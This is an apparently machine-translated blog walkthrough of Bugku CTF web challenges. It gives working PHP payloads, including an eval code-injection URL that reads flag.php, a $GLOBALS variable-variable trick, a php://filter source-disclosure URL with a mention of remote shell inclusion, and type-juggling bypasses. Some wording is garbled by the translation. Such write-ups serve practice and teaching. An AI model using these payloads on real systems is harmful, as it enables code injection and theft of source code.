当前位置：网站首页>Bugku web guide

Bugku web guide

2022-07-06 09:52:00 【XRSec】

web

web1

https://segmentfault.com/a/1190000016750234

Knowledge base

Several functions involved ：

1.$_REQUEST: Can be obtained to POST Methods and GET Data submitted by method , But it's slow

2.eval: Follow the string as PHP Code to calculate , The string must be legal PHP Code , And it must end with a semicolon .

<?php
eval("echo'hello';echo' world';");
?>
# output
hello world

3.var_dump: Function is used to output information about variables

#  Numbers 
var_dump(1); > int(1)
#  character string 
var_dump("string"); >  string(6) "string"

Their thinking

eval It should be the breakthrough of this problem , Be able to execute php Code .

hello Is a variable that accepts parameters , The next step is to build hello Variable , Enable it to close var_dump, utilize print_r Output

First close var_dump: 1)";

The second step is to build print_r：print_r(file("./flag.php"));

URL End of build ：

http://123.206.87.240:8003/index.php?hello=1);print_r(file("./flag.php")

Built URL The trigger eval Operation for

eval("var_dump(1);print_r(file("./flag.php")")

Output successful flag.php The contents of the document

web2

This question is about blasting code

web3

There is a problem with the source code

Knowledge base PHP Automated global variables ：**$GLOBALS** — References all variables available in the global scope , A global composite array containing all variables . The name of the variable is the key problem solving idea of the array

Regular expressions ”/^\w+$/“, Match string ,\w According to the character + Numbers + Underline { a-z,A-Z,_,0-9 }. If it doesn't match, it will output ‘’args error!‘’\

 Two `/``/` Indicates the beginning and end of a regular expression ,`^` Start character ,`$` End character ,`+` Representatives can have one or more `\w`

PHP The variable in can be used as the variable name of another variable ：$$args, Combine the first sentence flag In the variable !

So structure payload：URL?args=BLOBLAS

You can explode all args, It includes flag

web4

Knowledge base

Modify by capturing packets file Value method to run some files that should not be run

You can also output some sensitive configuration files and remote contains directly through this method shell（ The target host needs to be turned on allow_url_fopen)

Their thinking

By constructing the following statement ：

http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

Can get xxx.php Of the code base64 Encryption result , adopt base64 After decryption, you can get xxx.php Code for

web5

Knowledge base is not difficult , see php Language can understand the idea of the problem

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

http://xxx.com/?what=flag

web6

Knowledge base

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

The idea of solving the problem is obvious. This is post request

web7

Knowledge base > JavaScript Is a kind of script language belonging to the network , Has been widely used Web application development , Used to add various dynamic functions to web pages , Provide users with more smooth and beautiful browsing effect . Usually JavaScript The script is embedded in the HTML To realize its own functions . > jother It's different javascript Tools > a pile +! Just use the things jother decode > You can open Google browser Press F12 > then console Copy that pile of decoded things Press enter to decode > Think more about the source code , I don't know what the hell this is

copy To console

Show ”ctf{whatfk}”

obtain flag

web8

Knowledge base

php
$num=$_GET['num'];//GET How to get parameters 
if(!is_numeric($num))//is_numeric（） The function is to judge whether it is a number or a numeric string 
{
echo $num;
if($num==1)// Contradiction is both 1 And it's not a number 
echo 'flag{**********}';
}

Problem solving thinking structure num=1X Ｘ It can also be any letter or string , structure ｕｒｌ:http://xxx.com/get/index1.php?num=1xx

obtain flag